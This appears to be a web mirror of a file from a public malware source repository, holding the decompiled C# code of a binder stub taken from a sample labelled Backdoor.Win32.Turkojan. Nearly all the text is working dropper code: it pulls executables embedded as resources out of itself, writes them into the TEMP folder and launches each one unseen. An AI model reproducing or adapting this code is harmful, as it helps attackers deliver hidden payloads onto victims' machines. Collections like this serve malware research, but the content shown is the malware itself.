mirror of
https://github.com/vxunderground/MalwareSourceCode.git
synced 2025-01-31 22:37:27 +00:00
43 lines
1.5 KiB
C#
43 lines
1.5 KiB
C#
|
// Decompiled with JetBrains decompiler
|
|||
|
// Type: binderstub.Program
|
|||
|
// Assembly: dsdfggdfgd, Version=0.0.0.0, Culture=neutral, PublicKeyToken=null
|
|||
|
// MVID: 774DF6EC-7CD7-472C-B5F5-E0E4A9820F8B
|
|||
|
// Assembly location: C:\Users\Administrateur\Downloads\Virusshare-00000-msil\Backdoor.Win32.Turkojan.zwh-f0049c93796fd4cb0a1aa182144a91d8f55ea869b6c1c47f48a047e89db918cf.exe
|
|||
|
|
|||
|
using System;
|
|||
|
using System.Diagnostics;
|
|||
|
using System.IO;
|
|||
|
using System.Reflection;
|
|||
|
using System.Windows.Forms;
|
|||
|
|
|||
|
namespace binderstub
|
|||
|
{
|
|||
|
internal class Program
|
|||
|
{
|
|||
|
private static void Main()
|
|||
|
{
|
|||
|
string[] strArray = new string[2]{ "exe", "exe" };
|
|||
|
Assembly executingAssembly = Assembly.GetExecutingAssembly();
|
|||
|
string[] manifestResourceNames = executingAssembly.GetManifestResourceNames();
|
|||
|
int index = 0;
|
|||
|
foreach (string name in manifestResourceNames)
|
|||
|
{
|
|||
|
if (name.IndexOf(".exe") != -1)
|
|||
|
{
|
|||
|
Stream manifestResourceStream = executingAssembly.GetManifestResourceStream(name);
|
|||
|
byte[] buffer = new byte[manifestResourceStream.Length];
|
|||
|
manifestResourceStream.Read(buffer, 0, buffer.Length);
|
|||
|
string str = Environment.GetEnvironmentVariable("TEMP") + "\\zalali" + index.ToString() + "." + strArray[index];
|
|||
|
FileStream fileStream = new FileStream(str, FileMode.Create);
|
|||
|
fileStream.Write(buffer, 0, buffer.Length);
|
|||
|
fileStream.Dispose();
|
|||
|
manifestResourceStream.Dispose();
|
|||
|
Process.Start(str);
|
|||
|
++index;
|
|||
|
}
|
|||
|
}
|
|||
|
Application.Exit();
|
|||
|
}
|
|||
|
}
|
|||
|
}
|